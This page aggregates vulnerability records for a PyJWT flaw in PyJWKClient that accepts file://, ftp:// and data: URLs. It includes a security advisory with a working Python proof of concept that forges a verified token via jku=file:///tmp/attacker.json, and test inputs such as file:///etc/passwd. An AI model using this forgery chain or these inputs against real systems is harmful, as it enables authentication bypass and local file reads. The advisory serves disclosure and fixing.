Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-48522 (GCVE-0-2026-48522)
Vulnerability from cvelistv5 – Published: 2026-05-28 15:00 – Updated: 2026-06-02 15:47
VLAI
EPSS
Title
PyJWKClient: missing scheme allowlist enables SSRF + token forgery via file://, ftp://, data: schemes
Summary
PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib's default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application's jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained "plant a JWKS to forge tokens" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. This vulnerability is fixed in 2.13.0.
Severity
4.2 (Medium)
SSVC
Exploitation: poc
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://github.com/jpadilla/pyjwt/security/adviso… | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-48522",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-02T15:47:07.542817Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-02T15:47:49.649Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "pyjwt",
"vendor": "jpadilla",
"versions": [
{
"status": "affected",
"version": "\u003c 2.13.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib\u0027s default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application\u0027s jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained \"plant a JWKS to forge tokens\" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. This vulnerability is fixed in 2.13.0."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-441",
"description": "CWE-441: Unintended Proxy or Intermediary (\u0027Confused Deputy\u0027)",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-28T15:00:30.186Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4"
}
],
"source": {
"advisory": "GHSA-993g-76c3-p5m4",
"discovery": "UNKNOWN"
},
"title": "PyJWKClient: missing scheme allowlist enables SSRF + token forgery via file://, ftp://, data: schemes"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-48522",
"datePublished": "2026-05-28T15:00:30.186Z",
"dateReserved": "2026-05-21T16:18:10.619Z",
"dateUpdated": "2026-06-02T15:47:49.649Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-48522",
"date": "2026-06-18",
"epss": "0.00148",
"percentile": "0.04366"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-48522\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-28T16:16:29.150\",\"lastModified\":\"2026-06-02T17:16:35.877\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib\u0027s default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application\u0027s jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained \\\"plant a JWKS to forge tokens\\\" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. This vulnerability is fixed in 2.13.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N\",\"baseScore\":4.2,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.6,\"impactScore\":2.5}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-441\"},{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:pyjwt_project:pyjwt:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.13.0\",\"matchCriteriaId\":\"2692B308-E3F9-4586-AD28-F64C14358242\"}]}]}],\"references\":[{\"url\":\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-48522\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-02T15:47:07.542817Z\"}}}], \"references\": [{\"url\": \"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-02T15:45:52.539Z\"}}], \"cna\": {\"title\": \"PyJWKClient: missing scheme allowlist enables SSRF + token forgery via file://, ftp://, data: schemes\", \"source\": {\"advisory\": \"GHSA-993g-76c3-p5m4\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 4.2, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"jpadilla\", \"product\": \"pyjwt\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.13.0\"}]}], \"references\": [{\"url\": \"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\", \"name\": \"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib\u0027s default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application\u0027s jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained \\\"plant a JWKS to forge tokens\\\" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. This vulnerability is fixed in 2.13.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-441\", \"description\": \"CWE-441: Unintended Proxy or Intermediary (\u0027Confused Deputy\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918: Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-28T15:00:30.186Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-48522\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-02T15:47:49.649Z\", \"dateReserved\": \"2026-05-21T16:18:10.619Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-28T15:00:30.186Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-48522
Vulnerability from fkie_nvd - Published: 2026-05-28 16:16 - Updated: 2026-06-17 10:55
Severity
Summary
PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib's default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application's jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained "plant a JWKS to forge tokens" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. This vulnerability is fixed in 2.13.0.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4 | Exploit, Mitigation, Vendor Advisory | |
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4 | Exploit, Mitigation, Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| pyjwt_project | pyjwt | * |
{
"affected": [
{
"affectedData": [
{
"product": "pyjwt",
"vendor": "jpadilla",
"versions": [
{
"status": "affected",
"version": "\u003c 2.13.0"
}
]
}
],
"source": "security-advisories@github.com"
}
],
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pyjwt_project:pyjwt:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2692B308-E3F9-4586-AD28-F64C14358242",
"versionEndExcluding": "2.13.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib\u0027s default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application\u0027s jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained \"plant a JWKS to forge tokens\" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. This vulnerability is fixed in 2.13.0."
}
],
"id": "CVE-2026-48522",
"lastModified": "2026-06-17T10:55:03.530",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 2.5,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-48522",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "no"
},
{
"technicalImpact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-02T15:47:07.542817Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-05-28T16:16:29.150",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-441"
},
{
"lang": "en",
"value": "CWE-918"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-993G-76C3-P5M4
Vulnerability from github – Published: 2026-06-15 19:28 – Updated: 2026-06-15 19:28
VLAI
Summary
PyJWKClient: missing scheme allowlist enables CVE-2024-21643-class SSRF + token forgery via file://, ftp://, data: schemes
Details
[!NOTE] The library does not directly return non-HTTP(S) URI contents to the attacker; the chained "plant a JWKS to forge tokens" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. Severity is scored for the scheme-acceptance bug in isolation.
Summary
PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib's default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch.
If an application's jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can:
- Cause PyJWKClient to read arbitrary local files via
file://(SSRF on local filesystem) — the file's contents are passed tojson.load. - Cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface).
- Forge tokens that PyJWT verifies as valid — if the attacker can write to any path the JKU URL points at AND influences the URL, they can plant a JWK Set containing their own public key, sign tokens with the matching private key, and
jwt.decode()accepts.
Affected versions
Tested and reproducible on PyJWT 2.11.0 and 2.12.1. Likely all versions back to PyJWKClient introduction.
Reproducer (full attack chain — verified empirically)
import jwt as pyjwt
from jwt import PyJWKClient
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
import json, base64, time
# Attacker generates keypair (no relation to real IdP)
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
pub_n = key.public_key().public_numbers().n
def b64u(n):
bl = (n.bit_length() + 7) // 8
return base64.urlsafe_b64encode(n.to_bytes(bl, 'big')).rstrip(b'=').decode()
# Attacker writes JWK Set containing their public key to /tmp
jwks = {"keys":[{"kty":"RSA","kid":"attacker","use":"sig","alg":"RS256",
"n":b64u(pub_n),"e":"AQAB"}]}
with open("/tmp/attacker.json","w") as f:
json.dump(jwks, f)
# Attacker mints token signed with their private key, jku=file://
priv_pem = key.private_bytes(serialization.Encoding.PEM,
serialization.PrivateFormat.PKCS8, serialization.NoEncryption())
now = int(time.time())
token = pyjwt.encode(
{"sub":"attacker","aud":"target-app","iat":now,"exp":now+3600},
priv_pem, algorithm="RS256",
headers={"kid":"attacker","jku":"file:///tmp/attacker.json","typ":"JWT"})
# Vulnerable application pattern: caller derives jku from token header
# and passes to PyJWKClient without scheme validation
header = pyjwt.get_unverified_header(token)
client = PyJWKClient(header["jku"]) # <-- accepts file:// silently
key_obj = client.get_signing_key_from_jwt(token)
decoded = pyjwt.decode(token, key_obj.key, algorithms=["RS256"],
audience="target-app")
print("Token verified:", decoded)
# Output: Token verified: {'sub': 'attacker', 'aud': 'target-app', ...}
Cross-library evidence — PyJWT is the outlier
The same composition pattern is structurally safe in 4 other mainstream JWT libraries:
| Library | Behavior on jku=file://... |
Mechanism |
|---|---|---|
| PyJWT 2.12.1 (Python) | Reads file from disk, parses, uses for signature verification | urllib default OpenerDirector includes FileHandler |
| panva/jose 6.2.3 (Node.js) | Refuses pre-fetch | WHATWG fetch() rejects non-http(s) at fetch-spec layer |
| golang-jwt + MicahParks/keyfunc v3.4.0 (Go) | Refuses pre-fetch | http.DefaultTransport only registers http/https |
| Microsoft.IdentityModel.Tokens 8.18.0 (.NET) | Refuses pre-fetch | HttpDocumentRetriever defaults RequireHttps=true |
| Spring Security NimbusJwtDecoder 6.3.4 (Java) | Refuses pre-fetch | URI parser delegation refuses non-http(s) at request build |
PyJWT is the only library of these 5 where the default behavior allows file:// to reach the fetch layer.
Recommended fix
Add allowed_schemes: tuple[str, ...] = ("https", "http") kwarg to PyJWKClient.__init__. Pre-validate URL scheme before invoking urllib.request.urlopen. URLs with disallowed schemes raise PyJWKClientError before any fetch is attempted.
Diff sketch against jwt/jwks_client.py
def __init__(
self, uri: str,
cache_keys: bool = False, max_cached_keys: int = 16,
cache_jwk_set: bool = True, lifespan: float = 300,
headers: dict[str, Any] | None = None, timeout: float = 30,
ssl_context: SSLContext | None = None,
allowed_schemes: tuple[str, ...] = ("https", "http"), # NEW
):
"""...
:param allowed_schemes: URL schemes the JWKS endpoint is permitted
to use. Default ``("https", "http")``. Pass ``("https",)`` for
HTTPS-only operation. URLs with disallowed schemes raise
``PyJWKClientError`` before any fetch is attempted.
"""
# ... existing init code ...
self.allowed_schemes = allowed_schemes
self._validate_uri_scheme()
def _validate_uri_scheme(self) -> None:
"""Reject the configured URI early if its scheme isn't allowed."""
from urllib.parse import urlparse
parsed = urlparse(self.uri)
scheme = parsed.scheme.lower()
if not scheme:
raise PyJWKClientError(
f"PyJWKClient URI '{self.uri}' has no scheme; expected one of "
f"{self.allowed_schemes!r}")
if scheme not in self.allowed_schemes:
raise PyJWKClientError(
f"PyJWKClient URI scheme '{scheme}' is not in allowed_schemes "
f"{self.allowed_schemes!r}; refusing to fetch from this URL")
Tests to add
def test_pyjwkclient_rejects_file_scheme():
with pytest.raises(PyJWKClientError, match="not in allowed_schemes"):
PyJWKClient("file:///etc/passwd")
def test_pyjwkclient_rejects_ftp_scheme():
with pytest.raises(PyJWKClientError):
PyJWKClient("ftp://example.org/keys.json")
def test_pyjwkclient_rejects_data_scheme():
with pytest.raises(PyJWKClientError):
PyJWKClient('data:application/json,{"keys":[]}')
def test_pyjwkclient_caller_can_lock_to_https_only():
with pytest.raises(PyJWKClientError):
PyJWKClient("http://internal.test/jwks.json", allowed_schemes=("https",))
Compatibility
- Default
allowed_schemes=("https", "http")preserves backwards compatibility for the overwhelming majority of callers using HTTP/HTTPS JWKS endpoints - Breaking only for callers using non-HTTP schemes intentionally (vanishingly rare)
- No changes to urllib fetch logic itself — the fix is a pre-validation gate
Class precedent
This is the same class as CVE-2024-21643 (Apache Jena JKU-trust: attacker-supplied JKU URL fetched without scheme validation). NVD-rated CVSS 7.5.
Prior art (verified 2026-05-06)
Confirmed via live recon (NVD direct, OSV.dev, PyJWT GitHub Security Advisories, issue/PR keyword search, CHANGELOG inspection):
- No existing CVE on PyJWT specifically for PyJWKClient URL scheme handling
- No existing GitHub issue or PR addressing scheme allowlisting
- No silent fix in CHANGELOG through 2.12.1
- 5 prior PyJWT advisories (CVE-2017-11424, CVE-2022-29217, CVE-2024-53861, CVE-2025-45768, CVE-2026-32597) — none cover this class
Credit
Reported by Keijo Tuominen — independent security research at CMHT.tech (https://cmht.tech).
Reproduction artifacts available on request: full multi-language probe pack (5 wrappers × 25 fixtures × 125 cells) demonstrating cross-library divergence at the URL-scheme boundary.
Severity
4.2 (Medium)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.12.1"
},
"package": {
"ecosystem": "PyPI",
"name": "PyJWT"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.13.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48522"
],
"database_specific": {
"cwe_ids": [
"CWE-441",
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-15T19:28:41Z",
"nvd_published_at": "2026-05-28T16:16:29Z",
"severity": "MODERATE"
},
"details": "\u003e [!NOTE]\n\u003e The library does not directly return non-HTTP(S) URI contents to the attacker; the chained \"plant a JWKS to forge tokens\" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. Severity is scored for the scheme-acceptance bug in isolation.\n\n## Summary\n\nPyJWKClient passes its `uri` argument directly to `urllib.request.urlopen()` which uses Python stdlib\u0027s default `OpenerDirector` registering `HTTPHandler`, `HTTPSHandler`, `FTPHandler`, **`FileHandler`**, and `DataHandler`. There is currently no documented option to restrict which schemes PyJWKClient will fetch.\n\nIf an application\u0027s `jku` URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can:\n\n1. Cause PyJWKClient to read arbitrary local files via `file://` (SSRF on local filesystem) \u2014 the file\u0027s contents are passed to `json.load`.\n2. Cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface).\n3. **Forge tokens that PyJWT verifies as valid** \u2014 if the attacker can write to any path the JKU URL points at AND influences the URL, they can plant a JWK Set containing their own public key, sign tokens with the matching private key, and `jwt.decode()` accepts.\n\n## Affected versions\n\nTested and reproducible on **PyJWT 2.11.0 and 2.12.1**. Likely all versions back to PyJWKClient introduction.\n\n## Reproducer (full attack chain \u2014 verified empirically)\n\n```python\nimport jwt as pyjwt\nfrom jwt import PyJWKClient\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives import serialization\nimport json, base64, time\n\n# Attacker generates keypair (no relation to real IdP)\nkey = rsa.generate_private_key(public_exponent=65537, key_size=2048)\npub_n = key.public_key().public_numbers().n\n\ndef b64u(n):\n bl = (n.bit_length() + 7) // 8\n return base64.urlsafe_b64encode(n.to_bytes(bl, \u0027big\u0027)).rstrip(b\u0027=\u0027).decode()\n\n# Attacker writes JWK Set containing their public key to /tmp\njwks = {\"keys\":[{\"kty\":\"RSA\",\"kid\":\"attacker\",\"use\":\"sig\",\"alg\":\"RS256\",\n \"n\":b64u(pub_n),\"e\":\"AQAB\"}]}\nwith open(\"/tmp/attacker.json\",\"w\") as f:\n json.dump(jwks, f)\n\n# Attacker mints token signed with their private key, jku=file://\npriv_pem = key.private_bytes(serialization.Encoding.PEM,\n serialization.PrivateFormat.PKCS8, serialization.NoEncryption())\nnow = int(time.time())\ntoken = pyjwt.encode(\n {\"sub\":\"attacker\",\"aud\":\"target-app\",\"iat\":now,\"exp\":now+3600},\n priv_pem, algorithm=\"RS256\",\n headers={\"kid\":\"attacker\",\"jku\":\"file:///tmp/attacker.json\",\"typ\":\"JWT\"})\n\n# Vulnerable application pattern: caller derives jku from token header\n# and passes to PyJWKClient without scheme validation\nheader = pyjwt.get_unverified_header(token)\nclient = PyJWKClient(header[\"jku\"]) # \u003c-- accepts file:// silently\nkey_obj = client.get_signing_key_from_jwt(token)\ndecoded = pyjwt.decode(token, key_obj.key, algorithms=[\"RS256\"],\n audience=\"target-app\")\nprint(\"Token verified:\", decoded)\n# Output: Token verified: {\u0027sub\u0027: \u0027attacker\u0027, \u0027aud\u0027: \u0027target-app\u0027, ...}\n```\n\n## Cross-library evidence \u2014 PyJWT is the outlier\n\nThe same composition pattern is structurally safe in 4 other mainstream JWT libraries:\n\n| Library | Behavior on `jku=file://...` | Mechanism |\n|---|---|---|\n| **PyJWT 2.12.1** (Python) | **Reads file from disk, parses, uses for signature verification** | urllib default OpenerDirector includes FileHandler |\n| panva/jose 6.2.3 (Node.js) | Refuses pre-fetch | WHATWG `fetch()` rejects non-http(s) at fetch-spec layer |\n| golang-jwt + MicahParks/keyfunc v3.4.0 (Go) | Refuses pre-fetch | `http.DefaultTransport` only registers http/https |\n| Microsoft.IdentityModel.Tokens 8.18.0 (.NET) | Refuses pre-fetch | `HttpDocumentRetriever` defaults `RequireHttps=true` |\n| Spring Security NimbusJwtDecoder 6.3.4 (Java) | Refuses pre-fetch | URI parser delegation refuses non-http(s) at request build |\n\nPyJWT is the only library of these 5 where the default behavior allows `file://` to reach the fetch layer.\n\n## Recommended fix\n\nAdd `allowed_schemes: tuple[str, ...] = (\"https\", \"http\")` kwarg to `PyJWKClient.__init__`. Pre-validate URL scheme before invoking `urllib.request.urlopen`. URLs with disallowed schemes raise `PyJWKClientError` before any fetch is attempted.\n\n### Diff sketch against `jwt/jwks_client.py`\n\n```python\ndef __init__(\n self, uri: str,\n cache_keys: bool = False, max_cached_keys: int = 16,\n cache_jwk_set: bool = True, lifespan: float = 300,\n headers: dict[str, Any] | None = None, timeout: float = 30,\n ssl_context: SSLContext | None = None,\n allowed_schemes: tuple[str, ...] = (\"https\", \"http\"), # NEW\n):\n \"\"\"...\n :param allowed_schemes: URL schemes the JWKS endpoint is permitted\n to use. Default ``(\"https\", \"http\")``. Pass ``(\"https\",)`` for\n HTTPS-only operation. URLs with disallowed schemes raise\n ``PyJWKClientError`` before any fetch is attempted.\n \"\"\"\n # ... existing init code ...\n self.allowed_schemes = allowed_schemes\n self._validate_uri_scheme()\n\n\ndef _validate_uri_scheme(self) -\u003e None:\n \"\"\"Reject the configured URI early if its scheme isn\u0027t allowed.\"\"\"\n from urllib.parse import urlparse\n parsed = urlparse(self.uri)\n scheme = parsed.scheme.lower()\n if not scheme:\n raise PyJWKClientError(\n f\"PyJWKClient URI \u0027{self.uri}\u0027 has no scheme; expected one of \"\n f\"{self.allowed_schemes!r}\")\n if scheme not in self.allowed_schemes:\n raise PyJWKClientError(\n f\"PyJWKClient URI scheme \u0027{scheme}\u0027 is not in allowed_schemes \"\n f\"{self.allowed_schemes!r}; refusing to fetch from this URL\")\n```\n\n### Tests to add\n\n```python\ndef test_pyjwkclient_rejects_file_scheme():\n with pytest.raises(PyJWKClientError, match=\"not in allowed_schemes\"):\n PyJWKClient(\"file:///etc/passwd\")\n\ndef test_pyjwkclient_rejects_ftp_scheme():\n with pytest.raises(PyJWKClientError):\n PyJWKClient(\"ftp://example.org/keys.json\")\n\ndef test_pyjwkclient_rejects_data_scheme():\n with pytest.raises(PyJWKClientError):\n PyJWKClient(\u0027data:application/json,{\"keys\":[]}\u0027)\n\ndef 